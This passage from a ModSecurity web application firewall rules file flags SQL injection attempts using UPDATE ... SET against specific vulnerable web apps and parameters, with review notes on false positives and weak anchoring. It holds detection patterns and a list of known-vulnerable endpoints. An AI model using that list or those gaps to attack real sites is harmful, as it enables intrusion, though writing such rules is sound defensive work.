index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE
# Unlike the parameter-specific rules in this file, this chain does its own
# pattern match: after the path substring test it runs (?i:UPDATE.+SET) over
# QUERY_STRING and REQUEST_BODY.
# NOTE(review): the pattern has no word boundaries and uses a greedy ".+", so
# ordinary text that contains "update" followed anywhere later by "set" (for
# example "updates" ... "settings") satisfies it. Expect false positives on
# free-text fields; \b anchors around both keywords would narrow it.
# NOTE(review): the chained test lists no t: actions of its own. Confirm which
# transformations apply to it (the t: list on the first rule may not carry
# over to later links) so that the keyword match sees decoded input.
# The last setvar copies %{matched_var} into a TX variable; for REQUEST_BODY
# that is presumably the whole body, so size and sensitivity of what ends up
# in the transaction data and logs should be checked.
SecRule REQUEST_LINE "@contains /wbsearch.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005668,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3106'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE
# Same chained pattern as 2005668, (?i:UPDATE.+SET) over QUERY_STRING and
# REQUEST_BODY, with the path substring "/vBSupport.php". The same cautions
# apply: no word boundaries, greedy match, and no t: actions on the chained
# test.
SecRule REQUEST_LINE "@contains /vBSupport.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005353,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE',tag:'web-application-attack',tag:'url,www.vbulletin.org/forum/showthread.php?t=94023&page=38'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005359) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE
SecRule REQUEST_LINE "@contains /vBSupport.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005359,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24397'" SecRule &TX:'/SQL_INJECTION.*ARGS:ticketid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE SecRule REQUEST_LINE "@contains /printview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004753,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3351'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004886) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004886,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3325'" SecRule &TX:'/SQL_INJECTION.*ARGS:showonly/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005244) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005244,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3172'" SecRule &TX:'/SQL_INJECTION.*ARGS:picID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005250) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005250,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0270'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE SecRule REQUEST_LINE "@contains 
/gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005255,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0270'"
SecRule &TX:'/SQL_INJECTION.*ARGS:galleryID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2005163 (xNews.php / id). Two-link chain: link 1 requires the literal
# substring "/xNews.php" in REQUEST_LINE (after t:urlDecodeUni, t:htmlEntityDecode
# and t:normalisePathWin); link 2 requires at least one TX variable whose name
# matches the regex /SQL_INJECTION.*ARGS:id/. When both hold, the actions add
# tx.critical_anomaly_score to tx.anomaly_score, set tx.msg, store the match under
# tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<matched_var_name> and add part E to the
# audit log parts for the transaction.
# NOTE(review): no link inspects the parameter value or the UPDATE keyword named
# in msg; the rule only labels a hit that an earlier rule stored in TX (presumably
# the generic CRS SQL injection rules -- confirm they are loaded before this file,
# otherwise the chain can never complete).
# NOTE(review): @contains is case-sensitive and no t:lowercase is applied, so the
# mixed-case literal only matches that exact casing; on a case-insensitive host
# consider t:lowercase with a lowercase literal.
# NOTE(review): logdata prints TX.0, which relies on `capture`; confirm that
# @contains populates TX.0 in the deployed ModSecurity version.
# (2005163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE
SecRule REQUEST_LINE "@contains /xNews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005163,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3216'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2011559 (Joomla com_zoomportfolio / id). Chain of REQUEST_LINE substring
# links ("/index.php", "GET ", "option=com_zoomportfolio", "view=portfolio")
# followed by the TX name lookup /SQL_INJECTION.*ARGS:id/.
# NOTE(review): the t: transformations are listed only on the first link; the later
# links carry just "chain". Confirm which transformations they run with under the
# active SecDefaultAction, since substring matching is sensitive to encoding.
# (2011559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011559,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain"
SecRule REQUEST_LINE "@contains 
view=portfolio" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011382) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /refund_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011382,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,41377'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:orderid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011450) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /classified_img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011450,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,41204'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:clsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011835) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /admincp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011835,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains section=smilies" "chain" SecRule REQUEST_LINE "@contains action=edit" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:smilieid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OvBB admincp.php smilieid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011841) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /infusions/mg_user_fotoalbum_panel/mg_user_fotoalbum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011841,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:album_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion mguser fotoalbum album_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011879) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011879,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:editmenu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DBHcms editmenu Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /site_info.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011934,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:siid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interactive Web Solutions site_info.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /filemgmt/singlefile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011947,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection 
Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GeekLog filemgt UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012005 (digiSHOP cart.php / id). Four-link chain: REQUEST_LINE must contain
# "/cart.php", "GET " and "m=features", and at least one TX variable name must match
# /SQL_INJECTION.*ARGS:id/. The actions on the last link raise tx.anomaly_score by
# tx.critical_anomaly_score and record tx.msg.
# NOTE(review): the "GET " link limits this rule to request lines containing that
# token, so the product-specific alert is raised for GET requests only; other
# methods are left to whatever rule populated the SQL_INJECTION TX entry.
# NOTE(review): each @contains is an independent substring test on the whole
# request line, not a parsed path or parameter comparison, so unrelated URLs that
# happen to contain the same substrings also satisfy these links.
# (2012005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /cart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012005,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains m=features" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS digiSHOP cart.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012020 (DVD Rental Software / cat_id). REQUEST_LINE must contain
# "/index.php", "GET ", "view=catalog" and "item_type=M"; the last link then runs
# the case-insensitive regex UPDATE.+SET over QUERY_STRING and REQUEST_BODY.
# NOTE(review): unlike the neighbouring rules, this one does not look up a
# SQL_INJECTION TX entry and never references cat_id, although msg names that
# parameter; the regex matches UPDATE ... SET anywhere in the query string or body.
# Expect matches on benign text that contains both words (constructed example:
# "updates&tab=settings"); consider scoping the last link to ARGS:cat_id if that
# parameter is the intent.
# NOTE(review): no t: transformation is listed on the regex link; confirm what the
# active SecDefaultAction applies before relying on it for encoded input.
# (2012020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012020,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains view=catalog" "chain"
SecRule REQUEST_LINE "@contains item_type=M" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVD Rental Software cat_id parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012030) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /takefreestart.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012030,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:tid2/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pre Online Tests Generator Pro UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012038,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains mod=publisher" "chain" SecRule REQUEST_LINE "@contains op=printarticle" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:artid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia artid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection 
Attempt SecRule REQUEST_LINE "@contains /informacion_general.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012163,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Informacion General informacion_general.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012215) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /program/moduler_banner_aabn.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012215,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tunngavik CMS id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012342) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /infusions/teams_structure/team.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012342,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection 
Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:team_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-fusion Team Structure Infusion team_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012350 (PMB Services / id). Four-link chain: REQUEST_LINE must contain
# "/index.php", "GET " and "lvl=coll_see", and at least one TX variable name must
# match /SQL_INJECTION.*ARGS:id/. On a full match the rule adds
# tx.critical_anomaly_score to tx.anomaly_score and sets tx.msg.
# NOTE(review): the TX name regex has no end anchor, so /SQL_INJECTION.*ARGS:id/
# also matches entries recorded for longer parameter names that begin with "id"
# (id_novedad, used by rule 2012363 below, is one). If only the exact parameter is
# meant, an anchored pattern (ARGS:id$) would say so -- verify against the TX names
# the generic rules actually write before changing it.
# NOTE(review): "/index.php" with a parameter named "id" is a very common
# combination; "lvl=coll_see" is the only link specific to this product, so treat
# the product name in msg as a hint during triage, not as confirmation.
# (2012350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012350,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains lvl=coll_see" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMB Services id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# Rule 2012363 (T-Content Management System / id_novedad). Three-link chain:
# REQUEST_LINE must contain "/notaevento.php" and "GET ", and at least one TX
# variable name must match /SQL_INJECTION.*ARGS:id_novedad/.
# NOTE(review): msg names "UPDATE SET", but no link tests for those keywords; the
# same conditions are met by any SQL injection hit recorded for this parameter.
# (2012363) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /notaevento.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012363,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:id_novedad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS T-Content Management System id_novedad Parameter UPDATE SET SQL Injection 
